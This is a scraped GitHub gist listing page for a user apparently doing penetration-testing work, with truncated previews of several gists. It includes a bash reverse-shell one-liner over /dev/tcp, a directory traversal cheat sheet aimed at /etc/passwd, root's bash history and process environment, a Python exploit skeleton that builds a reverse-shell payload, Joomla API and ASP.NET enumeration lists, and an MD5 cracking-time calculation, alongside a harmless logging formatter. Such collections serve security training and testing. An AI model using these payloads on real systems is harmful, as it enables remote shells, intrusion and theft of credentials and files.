Column number in the table
SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'table_name';
lisp3r lisp3r
lisp3r
/ gist:94a90e1d8d244830c6819057b1eb6872
Created
April 26, 2021 21:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bash -i >& /dev/tcp/127.0.0.1/4444 0>&1 |
lisp3r
/ owo_formatter.py
Created
January 10, 2022 18:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import logging | |
| class OwOFormatter(logging.Formatter): | |
| def __init__(self): | |
| super().__init__(fmt="%(levelno)d: %(msg)s", datefmt=None, style='%') | |
| self.info_fmt = "[^w^] %(msg)s" | |
| self.err_fmt = "[UwU] %(msg)s" | |
| self.warn_fmt = "[OwO] %(msg)s" |
lisp3r
/ Directory Traversal Cheat Sheet
Last active
November 8, 2022 19:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| \?filename=../../../../../../etc/passwd | |
| \?filename=../../../../../../etc/hosts | |
| \?filename=../../../../../../etc/my.cnf | |
| \?filename=../../../../../../etc/crontab | |
| \?filename=../../../../../../root/.bash_history | |
| \?filename=../../../../../../proc/self/comm | |
| \?filename=../../../../../../proc/self/cmdline | |
| \?filename=../../../../../../proc/self/environ | |
| \?filename=../../../../../../proc/sched_debug | |
| \?filename=../../../../../../proc/mounts |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /api/index.php/v1/banners | |
| # /api/index.php/v1/banners/{banner_id} | |
| /api/index.php/v1/banners/clients | |
| # /api/index.php/v1/banners/clients/{client_id} | |
| /api/index.php/v1/banners/categories | |
| # /api/index.php/v1/banners/categories/{category_id} | |
| # /api/index.php/v1/banners/contenthistory/{banner_id} | |
| /api/index.php/v1/config/application?public=true | |
| # /api/index.php/v1/config/{component_name} | |
| /api/index.php/v1/contact |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // 0x616a2f656d6f682f -> aj/emoh/ -> /home/ja | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #include <string.h> | |
| void int64_to_char(char mesg[], int64_t num) { | |
| for(int i = 0; i < 8; i++) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Use the MD5 GPU hash rate from the GPU benchmark of this section | |
| # and calculate the cracking time in minutes with the following conditions. | |
| # Use a charset of all lower and upper case letters of the English alphabet | |
| # and use a password length of 8. Enter the answer as full minutes without seconds. | |
| charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" | |
| passw_length = 8 | |
| # hashcat -b | |
| hash_rate = 681851 * 100000 # hash rate for MD5 GPU from the benchmark |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import os, sys, argparse, urllib.parse, socket, requests, time | |
| def revshell(lhost, lport): | |
| command = f'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1' | |
| return compile_payload(command) | |
| def get_target_url(rhost, rport): |
lisp3r
/ find_uncommon_headers.java
Last active
April 28, 2024 15:34
Detecting Uncommon Headers in an API using Burp Bambda Filters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Source: https://danaepp.com/detecting-uncommon-headers | |
| String[] standardHeaders = { | |
| "accept-patch", | |
| "accept-ranges", | |
| "access-control-allow-credentials", | |
| "access-control-allow-headers", | |
| "access-control-allow-methods", | |
| "access-control-allow-origin", | |
| "access-control-expose-headers", |
lisp3r
/ system_web_enum.txt
Created
May 7, 2024 19:10
Wordlist for /aspnet_client/system_web/ enum by http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1_0_2204_21 | |
| 1_0_2914_0 | |
| 1_0_3705_0 | |
| 1_0_3705_209 | |
| 1_0_3705_288 | |
| 1_0_3705_6018 | |
| 1_1_4322_510 | |
| 1_1_4322_573 | |
| 1_1_4322_2032 | |
| 1_1_4322_2300 |